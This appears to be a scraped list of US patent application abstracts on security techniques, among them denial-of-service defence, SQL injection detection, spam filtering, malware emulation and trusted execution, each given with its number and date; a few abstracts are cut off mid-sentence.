20130219493Remote Security Self-Assessment Framework - A system for security self-assessment for a computer platform. The system comprises a memory, a processor, and an application stored in the memory. When executed by the processor, the application in association with a call to action transmits security self-assessment logic and at least one security self-assessment policy to a computer platform, wherein the security self-assessment policy defines at least one scan tool to be used by the security self-assessment logic when executed on the computer platform to perform a security self-assessment of the computer platform. The system further comprises a plurality of scan tools stored in the memory and accessible for downloading by the computer platform. The security self-assessment logic is configured to cause a processor of the computer platform to download at least one scan tool defined by the security self-assessment policy and to perform a security self-assessment.08-22-2013
20100269176Content Playback Apparatus and Content Playback Method - According to one embodiment, a content playback apparatus which acquires desired content from a specific site accessed via a network and plays back the acquired content, comprises a determination module configured to determine, when a data input request is received from a currently accessed site, whether or not the site is at least a site included in the specific site, and a controller configured to generate, when the determination module determines that the currently accessed site is not included in the specific site, a warning that advises accordingly.10-21-2010
20110219447Identification of Unauthorized Code Running in an Operating System's Kernel - Computer implemented methods, system and apparatus for managing execution of a running-page in a virtual machine include associating an execution trace code with the running page by a security virtual machine. The execution trace code generates a notification upon initiation of the execution of the running page by the virtual machine. The notification is received by the security virtual machine running independent of the virtual machine executing the running-page. The running page associated with the execution trace code is validated by the security virtual machine as authorized for execution. An exception is generated if the running-page is not authorized for execution. The generated exception is to prevent the execution of the running page in the virtual machine.09-08-2011
20110219445Methods, Systems and Computer Program Products for Identifying Traffic on the Internet Using Communities of Interest - Methods for identifying wanted traffic on the Internet are provided. The methods include determining a traffic history for a user of the Internet; identifying wanted traffic in a stream of Internet traffic based on the determined traffic history; and prioritizing the identified wanted traffic such that unwanted traffic is assigned a lower priority than the wanted traffic. Related systems and computer program products are also provided.09-08-2011
20110219446INPUT PARAMETER FILTERING FOR WEB APPLICATION SECURITY - Techniques are disclosed for enhancing the security of a web application by using input filtering. An input filter may be configured to process untrusted input data, character by character, and to replace certain characters in text-based input with visually similar characters. This approach may be used to block a specified list of “triggering” characters as they come in and replace them with characters similar in appearance but without the syntactic meaning that triggers an attack or otherwise exploits a vulnerability in a web-application.09-08-2011
20090265783Method to Enhance Platform Firmware Security for Logical Partition Data Processing Systems by Dynamic Restriction of Available External Interfaces - A system and method to reduce external access to hypervisor interfaces in a computer system, thereby reducing the possibility of attacks. In a preferred embodiment, addresses for calls are used to fill a table, where the addresses are specifically selected for a requesting computer. For example, in one embodiment, a routine searches for the adapter type of a requesting computer and populates the table with calls specific to that type of adapter. Other types of calls are not put in the table. Instead, those calls are replaced by routines that will return an error. In other embodiments, the operating system type is used to determine what addresses are used to populate the table. These and other embodiments are explained more fully below.10-22-2009
20100031357Defending Smart Cards Against Attacks by Redundant Processing - A method is provided which defends a computer program against attacks independently of the complexity of the program. A request to invoke the application is received. A process execution state is set to indicate a first execution. The application is executed in response to the request, and application data and control information calculated by the application is stored while the application is executed. The process execution state is set to indicate a subsequent execution. At least part of the application is executed for at least one subsequent time. Application data and control information calculated by the application during subsequent executions is compared with the data/information stored during first execution. The comparison is done by operation system services which are responsive to the process execution state. When the comparison shows a discrepancy in the compared application data and control information, appropriate error handling takes place.02-04-2010
20100031355UNVALIDATED PRIVILEGE CAP - A method for securely accessing an executable file object includes a step in which a request from the target process to access the executable file object is received by an operating system component, and the object is examined for validity before access is allowed. For objects that cannot be validated, the process is run with privileges bounded by the privilege cap, if the privilege cap permits execution of the object.02-04-2010
20100031354Distributive Security Investigation - A security investigation system uses a central server to distribute requests for security information regarding an asset, receive responses, and manage the information in the responses in a case object. Requests may be distributed to various servers, each of which may have an agent that may receive the request, search various databases, logs, and other locations, and generate a response. A case object may be continually updated in some embodiments. The case object may be viewed, analyzed, and other requests generated using automated or manual tools. A case object may be sanitized for analysis without compromising sensitive information.02-04-2010
20090282479METHOD AND SYSTEM FOR MISUSE DETECTION - A method and system for discovering inappropriate and/or illegitimate use of Web page content, comprising: monitoring access to a first Web page by a user; comparing information from the first Web page to information from a second known legitimate Web page; and determining whether the first Web page is legitimate based on the compared information.11-12-2009
20100005529PLATFORM VERIFICATION PORTAL - Described are computer-based methods and apparatuses, including computer program products, for a platform verification portal. A plurality of configuration items are stored with each comprising a plurality of verification commands capable of being executed by a verification scanning engine executing a verification scan on a target server to compare a set of actual software or configuration settings of the software against a desired software stack. A plurality of configuration item rules is stored. Execution of one or more verification scanning engines across a selected set of target servers is remotely initiated. A request for configuration items is received from each of the target servers. For each of the target servers a set of configuration items applicable to the target server is dynamically selected. For each of the target servers, a list identifying the set of configuration items is transmitted to the target server for execution by the verification scanning engine.01-07-2010
20100100959SYSTEM AND METHOD FOR MONITORING AND ANALYZING MULTIPLE INTERFACES AND MULTIPLE PROTOCOLS - The present invention is a system and method for providing security for a mobile device by analyzing data being transmitted or received by multiple types of networks. The invention can provide security for many types of network interfaces on a mobile device, including: Bluetooth, WiFi, cellular networks, USB, SMS, infrared, and near-field communication. Data is gathered at multiple points in a given processing pathway and linked by a protocol tracking component in order to analyze each protocol present in the data after an appropriate amount of processing by the mobile device. Protocol analysis components are utilized dynamically to analyze data and are re-used between multiple data pathways so as to be able to support an arbitrary number of network data pathways on a mobile device without requiring substantial overhead.04-22-2010
20090165132SYSTEM AND METHOD FOR SECURITY AGENT MONITORING AND PROTECTION - A security agent monitoring and protection system is provided. A security agent on an end point computing device can be accompanied by or can load into the device's memory at startup one or more independent software processes whose primary function is to directly protect the security agent itself and take protective actions against the end point computing device should a security agent protecting the device become disabled. Protection of the security agent can be achieved in several ways, including installing the security agent with restricted permissions, making it difficult to shutdown, restarting the security agent automatically if it is halted without authorization, disabling network connectivity of the end point device if the security agent does not successfully start or restart, protecting executable and dynamic link library (DLL) files of the security agent, and controlling access to the security agent's Common Object Model (COM) interfaces. These protective aspects can also be used by the monitoring agent itself to protect it from unauthorized access or disabling, further providing protection to the device.06-25-2009
20100100957Method And Apparatus For Controlling Unsolicited Messages In A Messaging Network Using An Authoritative Domain Name Server - Methods for controlling unsolicited messages in a messaging network using an authoritative domain name (DNS) server, in which a requester intending to send an e-mail message to a recipient queries the DNS server associated with the recipient's domain. The response sent from the DNS server is dependent upon a security policy associated with the requester, which results from interrogations to determine the probability that the requester is sending unsolicited messages or spam. A validity factor is set to a first indicator if the request passes or to a second indicator if the request fails. The response from the DNS server provides the network address if the validity factor is set to the first indicator. A suitable not-the-network-address response is sent if the validity factor is set to the second indicator. The authoritative DNS server thereby controls, blocks, or reroutes the message and lightens the load on the recipient's mail server and ISP(s).04-22-2010
20090320130TRAITOR DETECTION FOR MULTILEVEL ASSIGNMENT - One embodiment of the present invention includes a method for traitor tracing that includes performing an inner code traitor tracing on a recovered pirated digital file, the recovered digital file incorporating an inner code for assigning segments of the digital file and an outer code for assigning inner codes to individual digital files. The method also includes extracting partial information regarding the outer code from the inner code tracing. An outer code tracing procedure may then be performed using the partial information.12-24-2009
20100100958VISUAL DISPLAY OF WEBSITE TRUSTWORTHINESS TO A USER - Website trustworthiness is automatically displayed to a user by pre-establishing a user-defined good list identifying one or more known good website addresses. Each known good website address in the user-defined good list has associated therewith at least one user-defined visual characteristics for display. Subsequently, responsive to the user selecting to visit a website address identified in the user-defined good list, the website is displayed for the user and the user-defined visual characteristics associated therewith from the user-defined good list are also concurrently displayed with the website. The user-defined visual characteristics provide the user with a visual indication of website trustworthiness concurrently with display of the website.04-22-2010
20090077661Method and Apparatus for the Reliability of Host Data Stored on Fibre Channel Attached Storage Subsystems - A method for improving the reliability of host data stored on Fibre Channel attached storage subsystems by performing end-to-end data integrity checks. When a read or write operation is initiated, an initial checksum for data in the read/write operation is generated and associated with the data, wherein the association exists through a plurality of layers of software and attached storage subsystems. The initial checksum is passed with the data in the read/write path. When a layer of software in the read/write path receives the initial checksum and data, the layer performs an integrity check of the data, which includes generating another checksum and comparing it to the initial checksum. If the checksums do not match, the read/write operation fails and the error is logged. If the checksums match, the integrity check is repeated through each layer in the read/write path to enable detecting data corruption at the point of source.03-19-2009
20100005527SYSTEM AND METHOD FOR PROVIDING AND HANDLING EXECUTABLE WEB CONTENT - The present invention relates to a system for providing executable web content to a terminal. The present invention provides a system comprising a server, which provides an executable web content comprising a declarative language part in declarative language and a non-declarative part, and a gateway, which receives the executable web content from the server, converts it into a format executable in a web browser of the terminal, and transmits the converted content to the terminal.01-07-2010
20120110664METHOD AND APPARATUS FOR AVOIDING DENIAL OF SERVICE IN WEB-SERVICE BASED SYSTEMS - The disclosure relates to a method for identifying and preventing propagation of a DOS attack on a WS-Notification NotificationBroker by inspecting the subscription request. If the address of the NotificationConsumer identified by the subscription request is equivalent to that of the NotificationBroker then the subscription request is rejected.05-03-2012
20130185791VOUCHING FOR USER ACCOUNT USING SOCIAL NETWORKING RELATIONSHIP - Trusted user accounts of an application provider are determined. Graphs, such as trees, are created with each node corresponding to a trusted account. Each of the nodes is associated with a vouching quota, or the nodes may share a vouching quota. Untrusted user accounts are determined. For each of these untrusted accounts, a trusted user account that has a social networking relationship is determined. If the node corresponding to the trusted user account has enough vouching quota to vouch for the untrusted user account, then the quota is debited, a node is added for the untrusted user account to the graph, and the untrusted user account is vouched for. If not, available vouching quota may be borrowed from other nodes in the graph.07-18-2013
20110271340METHOD AND APPARATUS FOR DETECTING SPOOFED NETWORK TRAFFIC - A method and apparatus for detecting spoofed IP network traffic is presented. A mapping table is created to indicate correlations between IP address prefixes and AS numbers, based on routing information collected from a plurality of data sources. At each interface of a target network, IP address prefixes from a training traffic flow are acquired and further converted into AS numbers based on the mapping table. An EAS (Expected Autonomous System) table is populated by the AS numbers collected for each interface. The EAS table is used to determine if an operation traffic flow is allowed to enter the network.11-03-2011
20090150996APPLICATION PROTECTION FROM MALICIOUS NETWORK TRAFFIC - A program, method and system for embedding a programmable packet filter into an application to protect the application against malicious network packets are disclosed. Traditional packet filtering techniques to protect against malicious packets designed to exploit defects in applications, based on external packet filtering devices create a bottleneck in network traffic and present a large overhead cost. In addition, when security vulnerabilities in applications are discovered, traditional application updating methods lack a fast enough turn-around time to protect the application and users data from attack. These problems can be overcome by embedding a programmable packet filter into the application itself. The application can use the filter to discard malicious network packets. Furthermore, the filter can be updated via configuration files downloaded from the application vendor to update the application's embedded programmable packet filter without having to update the entire program code of the application.06-11-2009
20090070871COMMUNICATION SYSTEM AND METHOD - A method and system for communicating packetized audio or audio-visual communications over a data communications network is disclosed. Packets meeting a predetermined criterion are identified and bypass integrity protection. Integrity protection is applied to all other packets03-12-2009
20100281538Identification of Content by Metadata - Systems and methods for identifying content in electronic messages are provided. An electronic message may include certain content. The content is detected and analyzed to identify any metadata. The metadata may include a numerical signature characterizing the content. A thumbprint is generated based on the numerical signature. The thumbprint may then be compared to thumbprints of previously received messages. The comparison allows for classification of the electronic message as spam or not spam.11-04-2010
20100281535Electronic message delivery with estimation approaches - Interfaces for message delivery approaches are disclosed. The interface may include pages for administering accounts for senders, pages for administering message processing systems, and pages for viewing information about senders or message processing systems. In another aspect, automatic alert mechanisms are disclosed. The alert mechanisms send a message to one or more users or machines that have been registered to receive alerts. Alerts may be triggered by any event related to a sender, a message, or a message processing system or may be triggered by any other condition or event. In another aspect, techniques for automatically disabling senders are disclosed. The automatic disabling of a sender may be triggered by any event related to a sender, a message, or a message processing system or may be triggered by any other condition or event.11-04-2010
20100122342IDENTIFYING ABORMAL NETWORK TRAFFIC - A method of identifying traffic within a network representative of an abnormal network condition, including: monitoring a communications link for a high traffic volume level; identifying a domain being the source of the high traffic volume level; identifying within the domain, a sending entity transmitting traffic from the domain; using a detector located at or proximate to the domain to invoke a response from the sending entity; wherein a failure by the sending entity to provide an expected response to the message in accordance with a network protocol indicates that the traffic transmitted by the sending entity is traffic representative of an abnormal network condition.05-13-2010
20090094696SCANNING CIRCUIT AND METHOD FOR DATA CONTENT - The present invention relates to a data scanning circuit and method. According to the present invention, a memory circuit stores a plurality of codes. Each of the code corresponds to a sub-rule. The memory circuit outputs at least first bit and at least second bit of each code, respectively, according to a first and a second data items. An operational circuit performs logic operations on the first and second bits, and produces an operated result. A decision circuit decides whether the input data satisfies the scanning rule according to the operated result.04-09-2009
20120240226NETWORK ROUTERS AND NETWORK TRAFFIC ROUTING METHODS - A network router comprising a first communication interface for receiving traffic from a first traffic source and a second communication interface for receiving traffic from a second traffic source, a processor and memory. The processor of the router is to execute instructions stored in the memory to forward data traffic received at the first communication interface according to a first routing policy and to forward data traffic received at the second communication interface according to a second routing policy.09-20-2012
20100088765SYSTEM AND METHOD FOR FILTERING ELECTRONIC MESSAGES USING BUSINESS HEURISTICS - Disclosed are systems and methods for use in filtering electronic messages using business heuristics. In one aspect, a method includes determining whether the electronic message is associated with a desirable business, and adjusting the likelihood of delivering the electronic message to an intended recipient of the message if the electronic message is determined to be associated with the desirable business. In a more specific embodiment, the method further includes assigning a spam-score to the electronic message based on a likelihood that the electronic message is not unwanted by the intended recipient, blocking delivery of the electronic message to the intended recipient when the spam-score does not cross an overall threshold, and delivering the electronic message to the intended recipient based on the adjusted likelihood when the electronic message is determined to be associated with the desirable business.04-08-2010
20100088763Method for Preventing Denial of Service Attacks Using Transmission Control Protocol State Transition - Disclosed is a method of preventing a denial of service (DoS) attack using transmission control protocol (TCP) state transition. Flow of packets transmitted between a client and a server using TCP is monitored to prevent the DoS attack, e.g., SYN flooding, and to efficiently reduce the load on the server and provide mor secure service. By applying the method to a firewall, a proxy server, an intrusion detection system, etc., of a server, it is possible to make up for vulnerabilities regarding a DoS attack without disturbing a conventional TCP state transition operation and detect, verify and block DoS attacks abusing the vulnerabilities, thereby providing more secure service.04-08-2010
20120240225VERIFICATION APPARATUS AND VERIFICATION METHOD - A verification apparatus for verifying a verified apparatus corresponding to a first apparatus included in a plurality of information processing apparatuses includes a storage and a processor. The storage stores captured data acquired by capturing data transmitted and received among the plurality of information processing apparatuses. The processor receives first data transmitted from the verified apparatus. The first data is destined for a second apparatus included in the plurality of information processing apparatuses. The processor extracts, from the storage, second data transmitted from the second apparatus in response to third data transmitted from the first apparatus to the second apparatus. The third data corresponds to the first data. The processor transmits the extracted second data to the verified apparatus.09-20-2012
20110197276SYSTEM AND METHOD FOR VALIDATING AND CONTROLLING APPLICATIONS - A system and method for validating an application and for controlling execution of an application. A plurality of parameters may be computed for an authenticated object and for a tested object. A plurality of comparison and other metrics may be computed based on the computed plurality of parameters. Control of an execution of programs may be based on said metrics. Other embodiments are described and claimed.08-11-2011
20110197275STOPPING AND REMEDIATING OUTBOUND MESSAGING ABUSE - Systems and methods are provided for allowing subscriber message sending profiles to be maintained and used in conjunction with behavior-based anomaly detection techniques and traditional content-based spam signature filtering to enable application of appropriate message disposition policies to outbound subscriber message traffic. According to one embodiment, subscriber profiles are constructed for multiple subscriber accounts associated with a service provider based on outbound message flow originated from the subscriber accounts. Then, possible subscriber account misuse may be discovered by performing behavior-based anomaly detection, including a comparison of a subscriber profile associated with the subscriber account with recent subscriber account usage information, to identify one or more behavioral anomalies in outbound message flow originated from a subscriber account, the behavior-based anomaly detection.08-11-2011
20110197274RATE LIMITING DATA TRAFFIC IN A NETWORK - A network device coordinates with other devices in a network to create a distributed filtering system. The device detects an attack in the network, such as a distributed denial of service attack, and forwards attack information to the other devices. The devices may categorize data into one or more groups and rate limit the amount of data being forwarded based on rate limits for the particular categories. The rate limits may also be updated based on the network conditions. The rate limits may further be used to guarantee bandwidth for certain categories of data.08-11-2011
20110202995Single hardware platform multiple software redundancy - A process detects an attack on a software system, eradicates the attack, automatically loads software into the software system in response to the attack, and executes one or more of a reboot of the software system or a boot of the loaded software. The loaded software comprises a substantially similar functionality of at least a portion of the software system and a different implementation of the functionality of the portion of the software system.08-18-2011
20100088764RELAY DEVICE AND RELAY METHOD - An apparatus relays packets transferred over a network and discards an attack packet detected among the packets. The apparatus includes: an inspection-packet outputting unit that outputs, when detecting the attack packet, an inspection packet in which a transmission-source address contained in the attack packet is set as a destination address and a destination address contained in the attack packet is set as a transmission-source address; a filter table storing unit that stores, when acquiring a response packet for the inspection packet, a transmission-source address, a destination address, and identification information of an interface, which has received the response packet, that are contained in the response packet, in a filter table in an associated manner; and a transfer control unit that determines whether to transfer a packet as a transfer object based on the filter table.04-08-2010
20090307772 FRAMEWORK FOR SCALABLE STATE ESTIMATION USING MULTI NETWORK OBSERVATIONS - A framework for state estimation using multi-network observation. Highly scalable qualitative probabilistic algorithms may be used to combine noisy, uncertain outputs having multi-modal event data from numerous networks into a relatively accurate and coherent estimate of the system state. Models of disparate networks may be pulled together to result in unified multi-modal event data. Information from multiple networks may be graphed and analyzed.12-10-2009
20100088762APPARATUS AND METHOD FOR MONITORING NETWORK EQUIPMENT - A system that incorporates teachings of the present disclosure may include, for example, a server having a controller to receive a monitoring signal from a network plug-in device where the monitoring signal includes location and identification information associated with the network plug-in device and where the server is remote from the network plug-in device, and determine whether the network plug-in device is in an unauthorized location based at least in part on the monitoring signal. Other embodiments are disclosed.04-08-2010
20100088761CROSS-DOMAIN ACCESS PREVENTION - A method, system, and computer program product for cross-domain access prevention are provided. The method includes detecting a request from a first domain to access a second domain, and applying cross-domain access heuristics to determine whether to allow the request. The cross-domain access heuristics define common ownership characteristics between the first domain and the second domain. The method further includes performing the requested access in response to determining that the request complies with at least one of the cross-domain access heuristics, and blocking the requested access in response to determining that the request fails to comply with the cross-domain access heuristics.04-08-2010
20090049548Semiconductor Device and Method For Preventing Attacks on the Semiconductor Device - The invention relates to a method and to a semiconductor device, comprising means for detecting an unauthorized access to the semiconductor device, wherein the semiconductor device carries out an initialization of the semiconductor device following detection of an unauthorized access, wherein an information item relating to the unauthorized access can be stored by the semiconductor device prior to the initialization, and wherein the stored information item relating to the unauthorized access remains intact following the initialization of the semiconductor device. It is advantageously provided that the stored information item remains intact for a predetermined period of time following disconnection of the semiconductor device from a power supply.02-19-2009
20100083375DETECTION ACCURACY TUNING FOR SECURITY - Aspects of the subject matter described herein relate to tuning detection components of a security system. In aspects, a history of alerts is collected. This history is then used together with knowledge about tunable objects of the system to determine parameters of the tunable objects that can be changed to improve detection of the system. Parameters of tunable objects are adjusted in a simulator that determines an effect on alerts in the history based on the adjusted parameters. A recommendation of one or more tuning actions may be provided together with information regarding the effect of each tuning action.04-01-2010
20090172813Non-Invasive Monitoring of the Effectiveness of Electronic Security Services - Systems for the non-invasive monitoring of the effectiveness of a customer's electronic security services include a test generation engine for generating and launching a denatured attack towards a customer's network. A monitoring and evaluation agent is operatively coupled to the test generation engine and is adapted to monitor and evaluate the denatured attack. A recording and analysis engine is adapted to record and analyze the results of the denatured attack. Other systems and methods are also provided.07-02-2009
20100125910Systems and methods for media authentication - A method and system for authenticating a digital optical medium, such as a CD-ROM, determine whether the medium is an unauthorized copy, or the original. The original media is created, or altered, so as to contain anomalous locations from which the transfer of data is accomplished at different rates than a standard digital copy would exhibit. One implementation of the process involves timing analysis of the differences in data transfer rates, and does not necessarily require the retrying of data reads, nor does the process require the media to exhibit fatal errors, as in conventional approaches. The process can be employed in systems that control access to unauthorized copies, or may be used for other informative purposes. Theft, distribution, and piracy of digital content on optical media, such as computer software (also games, video, audio, e-book content), is often accomplished by copying it directly to another disc using commonly available copy tools and recordable optical media, or the replication of media to another mass manufactured disc. The present invention, which helps to irrefutably identify a unit of optical media as the original, and can correspondingly identify any copy made by any currently available means as such a copy, may prevent an unauthorized individual from making use of any unauthorized copies. This offers significant advantages to content creators who wish to protect their products.05-20-2010
20090049547System for real-time intrusion detection of SQL injection web attacks - A real-time anomaly SQL Injection detection system is provided to detect anomalies specific to the backend Database layer and the Web application layer of a Website. To reduce false alarms, the system correlates abnormal scores for the Database layer and Web application layer to detect and catch different forms of SQL injection attacks. The attacks are detected based on anomalies and not signatures or patterns.02-19-2009
20120233691METHOD, DEVICE AND SYSTEM FOR ALERTING AGAINST UNKNOWN MALICIOUS CODES - A method, a device, and a system for alerting against unknown malicious codes are disclosed. The method includes: detecting characteristics of a packet; judging whether any suspicious code exists in the packet according to a result of the detection; recording a source address of the suspicious code if the suspicious code exists in the packet; and sending alert information that carries the source address to a monitoring device. The embodiments of the present invention can report source addresses of numerous suspicious codes proactively at the earliest possible time, lay a foundation for shortening the time required for overcoming virus threats, and avoid the trouble of installing software on the client.09-13-2012
20090178138Stateless attestation system - A method includes assessing a trustworthiness level of a user computer by communication between the user computer and a first server. A record indicating the trustworthiness level is sent from the first server to the user computer, for storage by the user computer. A request is sent from the user computer to a second server, different from the first server, for a service to be provided to the user computer by the second server. The record is provided from the user computer to the second server by communicating between the user computer and the second server. At the second server, the trustworthiness level is extracted from the record, and the requested service is conditionally allowed to be provided to the user computer depending on the extracted trustworthiness level.07-09-2009
20120291128System and Method for Location, Time-of-Day, and Quality-of-Service Based Prioritized Access Control - A priority server for a provider network includes a traffic volume detection module, a traffic analyzer module, and a rules module. The traffic volume detection module receives operational information from the provider network and determines that a host is experiencing a flash event based upon the operational information. The traffic analyzer module determines that the flash event is not a distributed denial of service attack on the host. When it is determined that the flash event is not a distributed denial of service attack, the rules module provides a priority rule to an access router that is coupled to the host.11-15-2012
20120291127DISTINGUISHING BETWEEN BLUETOOTH VOICE AND DATA LINKS - Techniques are provided for receiving a transmitted first packet that was formatted using a known scrambling algorithm with an unknown scrambling seed. An encoded packet payload is extracted from the first packet header. The encoded packet payload header is decoded to obtain a first scrambled packet payload header. For each potential value of the unknown seed, the first scrambled packet payload header is descrambled to produce a first set of descrambled packet payload headers and for each potential value of initial register values associated with a cyclic redundancy check, the cyclic redundancy check is executed comprising polynomial division on each of the descrambled packet payload headers such that when the polynomial division results in a zero remainder, a potential unscrambled payload header for the first packet is obtained. Information about the first packet is obtained from the potential unscrambled payload header.11-15-2012
20090126013SYSTEMS AND METHODS FOR DETECTING CHILD IDENTITY THEFT - Embodiments of the present invention provide systems and methods for detecting an indication of a suspicious event associated with personal information of a child. Personal information representing a social security number of the child and a name of the child is received. Parent personal information representing contact information for a parent of the child is received. A child file for the child is created and stored on a computer-readable medium. The child file for the child includes the personal information representing the social security number of the child and the name of the child. The child file for the child is locked by associating an electronic notice to the child file for the child to prevent access to a database using at least part of the personal information of the child. The database includes credit data. The child file and the credit data is monitored for the indication of the suspicious event using the personal information representing the social security number of the child. A notification is transmitted to the parent using the parent personal information representing contact information for the parent. The notification is transmitted after detecting the indication of the suspicious event. The notification includes information associated with the indication of the suspicious event.05-14-2009
20090288164DIGITAL FORENSIC ANALYSIS USING EMPIRICAL PRIVILEGE PROFILING (EPP) FOR FILTERING COLLECTED DATA - A forensic device allows a user to remotely interrogate a target computing device in order to collect and analyze computer evidence that may be stored on the target computing device. The forensic device acquires the computer evidence from the target computing device and filters the computer evidence using an application-specific system-level privilege profile that describes the aggregate exercise of system-level privileges by a plurality of software application instances executing throughout an enterprise. The forensic device presents a user interface through which the remote user views the filtered computer evidence acquired from the target computing device. In this manner, forensic device allows the user to filter the collected computer evidence to data that is likely to have forensic relevance.11-19-2009
20090288162SYSTEM AND METHOD FOR DEFENDING AGAINST DENIAL OF SERVICE ATTACKS ON VIRTUAL TALK GROUPS - In one embodiment, a method includes establishing a first virtual talk group (VTG) that includes a plurality of endpoints and has a first multicast address. The plurality of endpoints includes a first endpoint and a second endpoint. The method also includes monitoring traffic associated with the first VTG, determining when a denial of service (DOS) attack is indicated by the traffic, and identifying at least one rogue endpoint responsible for the DOS attack when it is determined that the DOS attack is indicated. The first endpoint and the second endpoint are notified that they are to participate in a dynamic switchover to a second VTG when a DOS attack is indicated. The second VTG is established using a second multicast address, and includes the first endpoint and the second endpoint, but not the rogue endpoint.11-19-2009
20090089877DYNAMIC EMAIL DIRECTORY HARVEST ATTACK DETECTION AND MITIGATION - Dynamic directory harvest attack detection and mitigation system is accomplished by altering the logic surrounding how a receiving email server enforces its email delivery rules. The email server's assumed response to received emails is changed when it is determined that the server is under attack, thereby foiling the unauthorized acquisition of valid email addresses and other information retained by the email server.04-02-2009
20090089878System and Method for Detecting Multi-Component Malware - Malicious behavior of a computer program is detected using an emulation engine, an event detector and an event analyzer. The emulation engine includes a system emulator configured to emulate, in an isolated computer environment, at least a part of a computer system and a program emulator configured to emulate in the isolated computer environment execution of the computer program, including execution of a plurality of executable components of the computer program, such as execution processes and threads. The event detector is configured to monitor events being generated by two or more of the executable components. The event analyzer is configured to determine, substantially in real time, based at least on one or more events generated by each of two or more of the plurality of executable components whether or not the computer program exhibits malicious behavior, wherein individually one or more of the plurality of executable components may exhibit benign behavior.04-02-2009
20110173696QUANTUM COMMUNICATION SYSTEM AND METHOD - A quantum communication system, said system comprising: 07-14-2011
20120144482Method and System for Whitelisting Software Components - A method and system for whitelisting software components is disclosed. In a first operating environment, runtime information may be collected about a first loaded and executing software component. The collected information may be communicated to a second software component operating in a second operating environment that is isolated from the first operating environment. The collect runtime information may be compared with a validated set of information about the first software component. Other embodiments are described and claimed.06-07-2012
20110173697SYSTEM AND METHOD FOR DETECTING AND PREVENTING DENIAL OF SERVICE ATTACKS IN A COMMUNICATIONS SYSTEM - A method and system are provided for use in detecting and preventing attacks in a communications network. In one example, the method includes calculating first and second traffic volumes based on messages received at a first time and a second time, respectively. An average acceleration is calculated based on the first and second traffic volumes, and the method identifies whether the average acceleration has crossed a threshold. The messages are serviced only if the average acceleration has not crossed the threshold.07-14-2011
20090276850CONTENT SCREENING METHOD, APPARATUS AND SYSTEM - A content screening method, apparatus and system are provided for a content screening component to verify the trust relationship and the categorization standard used by a categorization component. A method includes the following steps: the content screening component receives a categorized content; and when determining that a first categorization component that categorizes the content is trustworthy according to the information of the categorization component carried in the categorized content, the content screening component screens the content by the content category carried in the categorized content. Another method includes the following step: when determining that the categorization component that categorizes the content uses the same categorization standard as the content screening component according to the information of the categorization component carried in the categorized content, the content screening component screens the content by the content category carried in the categorized content.11-05-2009
20090282476Hygiene-Based Computer Security - A reputation server is coupled to multiple clients via a network. Each client has a security module that detect malware at the client. The security module computes a hygiene score based on detected malware and provides it to the reputation server. The security module monitors client encounters with entities such as files, programs, and websites. When a client encounters an entity, the security module obtains a reputation score for the entity from the reputation server. The security module evaluates the reputation score and optionally cancels an activity involving the entity. The reputation server computes reputation scores for the entities based on the clients' hygiene scores and operations performed in response to the evaluations. The reputation server prioritizes malware submissions from the client security modules based on the reputation scores.11-12-2009
20090282478METHOD AND APPARATUS FOR PROCESSING NETWORK ATTACK - A network attack processing method and a processing apparatus are disclosed herein. The method may include; after determining an attacked object, searching for a recorded attack event related to the attacked object to determine a controlled host in an attack network; searching for a recorded control event related to the controlled host to determine a controlling host in the attack network; and determining a detected host which performs similar communication with the multiple controlling hosts as an attack manipulator. Accordingly, embodiments for a processing apparatus adapted to perform the methods are disclosed herein.11-12-2009
20090282477METHOD FOR VALIDATING AN UNTRUSTED NATIVE CODE MODULE - A system that validates a native code module. During operation, the system receives a native code module comprised of untrusted native program code. The system validates the native code module by: (1) determining that code in the native code module does not include any restricted instructions and/or does not access restricted features of a computing device; and (2) determining that the instructions in the native code module are aligned along byte boundaries such that a specified set of byte boundaries always contain a valid instruction and control flow instructions have valid targets. The system allows successfully-validated native code modules to execute, and rejects native code modules that fail validation. By validating the native code module, the system facilitates safely executing the native code module in the secure runtime environment on the computing device, thereby achieving native code performance for untrusted program binaries without significant risk of unwanted side effects.11-12-2009
20090288161METHOD FOR ESTABLISHING A TRUSTED RUNNING ENVIRONMENT IN THE COMPUTER - The present invention discloses a method for establishing a trusted running environment in a computer. A trusted file authentication module and a trusted process memory code authentication module are preset in operation system (OS) of the computer and a secured OS is loaded and run. The trusted file authentication module intercepts all file operation behaviors, checks whether current file to be operated is a trusted file or not, and processes the file according to its operation type if it is trusted, otherwise processes the file after its eligibility is verified; the trusted process memory code authentication module authenticates on timing whether the running state and the integrality for all process code are normal or not; if any process is abnormal, giving an alarm, saving field data run by the process and closing down the process; otherwise continuing to run normally. With this invention, the security for the running environment in the computer can be ensured whether the attack from known or unknown virus exists or not, and this facilitates application and reduces implementation cost.11-19-2009
20100287614Decoding method for a probabilistic anti-collusion code comprising the selection of the collusion strategy - The invention relates to a decoding method for a probabilistic anti-collusion code aiming to identify at least one sequence of the code present in a multimedia content having served in the creation of an illegal copy of the multimedia content, this method comprising a step of selection of the collusion strategy used to constitute the illegal copy from among a set of collusion strategy models. In addition, the invention relates to a method for filtering sequences of a probabilistic anti-collusion code for the decoding of this code aiming to identify at least one sequence of the code present in a multimedia content having served in the creation of an illegal copy of the multimedia content comprising a step of selection of a sub-group of the smallest possible sequences of code containing at least one sequence present in a multimedia content having served in the creation of the illegal copy by comparing for each sequence of the code and for a selected given symbol index, the symbol of the sequence of the code with the symbol of the sequence contained in the illegal copy.11-11-2010
20120297477DETECTION OF ACCOUNT HIJACKING IN A SOCIAL NETWORK - To protect a user of a social network, the user's activity is monitored during a baseline monitoring period to determine a baseline activity record. If subsequently monitored activity of the user deviates sufficiently from the baseline activity record to indicate abuse (hijacking) of the user's account, the abuse is mitigated, for example by notifying the user of the abuse. Monitored activity includes posting links, updating statuses, sending messages, and changing a profile. Monitoring also includes logging times of the user activity. Monitoring anomalous profile changes does not need a baseline.11-22-2012
20120297478METHOD AND SYSTEM FOR PREVENTING DNS CACHE POISONING - A method for preventing the poisoning of at least one DNS cache (11-22-2012
20120297479METHOD FOR EXECUTING AN APPLICATION - A method for executing an application (A) which includes executable native or interpretable code and calls functions of an operating system (BS), whereby the operating system (BS) transmits a result of the respective function call (f11-22-2012
